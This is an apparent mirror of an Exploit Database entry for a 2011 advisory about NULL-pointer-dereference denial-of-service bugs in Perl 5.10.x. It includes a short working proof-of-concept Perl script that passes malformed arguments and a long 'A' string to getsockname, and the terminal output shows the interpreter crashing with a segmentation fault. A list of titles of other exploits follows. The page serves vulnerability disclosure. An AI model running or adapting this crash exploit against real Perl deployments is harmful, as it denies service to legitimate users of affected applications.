Perl 5.10 – Multiple Null Pointer Dereference Denial of Service Vulnerabilities

Exploit Database
13 阅读

作者： Jonathan Brossard

日期： 2011-05-03
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/35725/

source: https://www.securityfocus.com/bid/47766/info

Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.

An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.

Perl versions 5.10.x are vulnerable. 

jonathan () blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
jonathan () blackbox:~/test$ perl poc1.pl
Segmentation fault (core dumped)
jonathan () blackbox:~/test$

last Exploits
Perl 5.10 – Multiple Null Pointer Dereference Denial of Service Vulnerabilities的更多信息

Corel VideoStudio Pro X3 – ‘.mp4’ Buffer Overflow：
Platinum SDK Library – POST UPnP ‘sscanf’ Buffer Overflow (PoC)：
Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm：
DivX Plus Web Player – ‘file://’ Buffer Overflow (PoC)：
NCSS 07.1.21 – Array Overflow with Write2：
NetServe FTP Client 1.0 – Local Denial of Service：
Apple WebKit – ‘FormSubmission::create’ Use-After-Free：
Microsoft Paint 5.1 – ‘.bmp’ Denial of Service：